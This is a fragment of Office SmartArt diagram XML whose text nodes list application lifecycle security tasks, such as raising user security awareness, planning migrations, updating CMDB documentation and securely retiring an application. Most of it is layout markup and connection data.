    <dgm:pt modelId="{585354FF-8734-42ED-AE1D-8349C73E2B59}" type="sibTrans" cxnId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36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Raise the security awareness of users and manage conflicts about usability vs. security.</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36639052-9A6E-47C7-A020-F81AA12F1A3C}" type="parTrans" cxnId="{EE369573-7275-4190-A508-8493472AD3CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1887D76E-BF0A-4F02-9071-53896CF7538A}" type="sibTrans" cxnId="{EE369573-7275-4190-A508-8493472AD3CB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60779E52-CC5F-4109-9E02-C8F73324C37D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36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Plan and manage changes, e.g. migrate to new versions of the application or other components like OS, middleware, and libraries.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C494CE06-D836-41D9-ADFD-898F15E5786C}" type="parTrans" cxnId="{49821016-59B2-49A9-8B65-5A27F6D118C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}" type="sibTrans" cxnId="{49821016-59B2-49A9-8B65-5A27F6D118C2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36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Update all documentation, including in the CMDB and the security architecture, controls, and countermeasures, including any runbooks or project documentation.</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121DD58-051E-4186-B611-30AF12D23895}" type="parTrans" cxnId="{B98CA423-6056-48A5-8715-E2F822D9E61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}" type="sibTrans" cxnId="{B98CA423-6056-48A5-8715-E2F822D9E61B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36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Securely retire the application, including deleting unused accounts and roles and permissions.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D2D2A06B-5339-4194-90B5-CCE406438AF1}" type="parTrans" cxnId="{7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F48BCD57-6AB8-45C6-AF3F-815020533A4D}" type="sibTrans" cxnId="{7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}">
      <dgm:prSet custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="54000" tIns="108000" rIns="36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Set your application’s state to retired in the CMDB.</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A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" type="parTrans" cxnId="{97452B92-22D7-4E80-B74D-5D72DE542765}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{56B4B5BC-D671-4D10-91B2-18BB09341248}" type="sibTrans" cxnId="{97452B92-22D7-4E80-B74D-5D72DE542765}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E38DBA4E-1590-4E8F-92F2-04F18E552021}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr lIns="54000" rIns="36000"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="57150" indent="-57150">
            <a:lnSpc>
              <a:spcPct val="90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Test the technical functions and integration with the IT architecture and coordinate business tests.</a:t>
          </a:r>
          <a:endParaRPr lang="de-DE"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4707E43C-0E63-42FE-96E7-6097CEC31A66}" type="parTrans" cxnId="{A994FEDD-5A8E-480B-AEF6-E54256EA5D11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9E962D11-84F0-4781-87CC-1DC58D8334B3}" type="sibTrans" cxnId="{A994FEDD-5A8E-480B-AEF6-E54256EA5D11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>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6" custScaleX="45202" custScaleY="82622">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="6" custScaleX="123722" custScaleY="90910">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>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6" custScaleX="45202" custScaleY="98507">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="6" custScaleX="123722" custScaleY="110001">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>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6" custScaleX="45202" custScaleY="98610">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="6" custScaleX="123722" custScaleY="102028">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6" custScaleX="45202" custScaleY="120963">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{992D08B6-B207-435B-A893-D17B49418ACB}" type="pres">
      <dgm:prSet presAssocID="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="6" custScaleX="123722" custScaleY="144855">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" type="pres">
      <dgm:prSet presAssocID="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6" custScaleX="45202" custScaleY="101258">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" type="pres">
      <dgm:prSet presAssocID="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="6" custScaleX="123722" custScaleY="107152">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{78713489-5D47-416E-ADAE-302406F812AE}" type="pres">
      <dgm:prSet presAssocID="{3AEE799B-7F35-4AE2-93E2-335733E35922}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="parentText" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6" custScaleX="45202" custScaleY="62093">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" type="pres">
      <dgm:prSet presAssocID="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="5" presStyleCnt="6" custScaleX="123722" custScaleY="62093">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{CFC5E301-BDE4-4D4C-B6FC-1C26EB94D275}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" srcOrd="2" destOrd="0" parTransId="{73A5B6BE-984C-43D5-83D1-70267B05EA9B}" sibTransId="{514DE64B-2054-4928-808C-6A92FFA3AA8E}"/>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{495252AF-5996-4B38-A1EE-B648650A10A0}" srcOrd="3" destOrd="0" parTransId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" sibTransId="{F126DBDA-495B-4894-915F-3153C0E98C12}"/>
    <dgm:cxn modelId="{68D71606-5C52-434C-93A7-B1ED203D82B8}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" srcOrd="0" destOrd="0" parTransId="{0B3561F2-F580-4BA5-B06C-3004CD728F94}" sibTransId="{2CCD953C-110F-4B11-9CBE-349755B93BC6}"/>
    <dgm:cxn modelId="{D9FCC50C-93E6-8543-8CA8-74A149D1BCEF}" type="presOf" srcId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B954E30F-1609-3843-ADCB-3E43BE2A335B}" type="presOf" srcId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{630BF613-79F8-428F-8964-E241E474DFB8}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" srcOrd="0" destOrd="0" parTransId="{AE4D7BED-3056-429A-A072-E4C06F9FCBBF}" sibTransId="{FFAF3F5C-16AC-4210-8AC4-B4A3C7CC1B6C}"/>
    <dgm:cxn modelId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" srcOrd="4" destOrd="0" parTransId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" sibTransId="{3AEE799B-7F35-4AE2-93E2-335733E35922}"/>
    <dgm:cxn modelId="{49821016-59B2-49A9-8B65-5A27F6D118C2}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" srcOrd="2" destOrd="0" parTransId="{C494CE06-D836-41D9-ADFD-898F15E5786C}" sibTransId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}"/>
    <dgm:cxn modelId="{7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" srcOrd="1" destOrd="0" parTransId="{D2D2A06B-5339-4194-90B5-CCE406438AF1}" sibTransId="{F48BCD57-6AB8-45C6-AF3F-815020533A4D}"/>
    <dgm:cxn modelId="{B98CA423-6056-48A5-8715-E2F822D9E61B}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" srcOrd="3" destOrd="0" parTransId="{F121DD58-051E-4186-B611-30AF12D23895}" sibTransId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}"/>
    <dgm:cxn modelId="{2C4DE126-1622-B542-B5B7-F903C68B00EA}" type="presOf" srcId="{719FD505-9C05-4301-8C8D-24A4329404ED}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{62404027-5448-4393-9E79-DA90FB84286A}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" srcOrd="3" destOrd="0" parTransId="{F5BE4E3D-749F-4DF5-916A-F051FA94842E}" sibTransId="{03388AB2-B7BD-4A7D-8228-58066747E14F}"/>
    <dgm:cxn modelId="{2AE97330-074B-4EBD-B20E-409131B4C40C}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" srcOrd="3" destOrd="0" parTransId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" sibTransId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}"/>
    <dgm:cxn modelId="{73D7DA33-1AC9-154A-9321-AECB1A180043}" type="presOf" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A9F06D3D-AB20-41E4-A679-6932A40B2975}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" srcOrd="5" destOrd="0" parTransId="{95A80FB8-E99D-4B78-9BC2-FB6B67B119BB}" sibTransId="{E1907769-F900-42C4-90C1-8BD2FCEB9830}"/>
    <dgm:cxn modelId="{E95B0A40-6F9D-4D44-9A58-2D2AA34CE3B4}" type="presOf" srcId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" srcOrd="3" destOrd="0" parTransId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" sibTransId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}"/>
    <dgm:cxn modelId="{D25B1A61-2C17-D045-8BA8-C03D84862479}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{051F9242-E1E2-2444-B3CE-725EAD7E4065}" type="presOf" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3C1E9E46-D915-461C-BCC6-0B4F63780CB5}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" srcOrd="0" destOrd="0" parTransId="{09E61F83-0B7F-450A-8267-AC41E419DB2F}" sibTransId="{2FA6E4AA-CA8D-4524-8451-A2B7B829BDA4}"/>
    <dgm:cxn modelId="{683E9267-0B08-6441-992E-63D946C0693E}" type="presOf" srcId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ECCFEE6A-CB8C-2F46-BC79-A83695AE02BC}" type="presOf" srcId="{E38DBA4E-1590-4E8F-92F2-04F18E552021}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{73C5906B-EA19-B945-B093-0E76B3BEC843}" type="presOf" srcId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BF55056D-FA90-AB44-9E77-172DB6E9FFE8}" type="presOf" srcId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A40ED050-BDA1-BA44-9165-1409C092BD58}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE369573-7275-4190-A508-8493472AD3CB}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" srcOrd="1" destOrd="0" parTransId="{36639052-9A6E-47C7-A020-F81AA12F1A3C}" sibTransId="{1887D76E-BF0A-4F02-9071-53896CF7538A}"/>
    <dgm:cxn modelId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" srcOrd="5" destOrd="0" parTransId="{E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" sibTransId="{585354FF-8734-42ED-AE1D-8349C73E2B59}"/>
    <dgm:cxn modelId="{B663EA81-9240-5F43-A148-92ACDFE7CC44}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0957F586-5356-EF45-966C-128E7F7AB956}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{21CCE488-FA7F-384A-A5E5-F7531C2F7A2D}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FD2F938D-2268-1D44-B5FE-1C8D4ECBCC08}" type="presOf" srcId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6C048991-4CC6-48F3-85DE-06094639B4B0}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" srcOrd="1" destOrd="0" parTransId="{6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" sibTransId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}"/>
    <dgm:cxn modelId="{97452B92-22D7-4E80-B74D-5D72DE542765}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" srcOrd="2" destOrd="0" parTransId="{A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" sibTransId="{56B4B5BC-D671-4D10-91B2-18BB09341248}"/>
    <dgm:cxn modelId="{0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{C2FA6099-3E27-E342-AE5C-972353DC41D1}" type="presOf" srcId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" srcOrd="0" destOrd="0" parTransId="{A201932A-BA50-4861-8522-7F31487BAA62}" sibTransId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}"/>
    <dgm:cxn modelId="{953325A0-207E-4AE6-A6DC-14B69025B19F}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" srcOrd="1" destOrd="0" parTransId="{21595102-299C-4FC9-AD15-9036120CA438}" sibTransId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}"/>
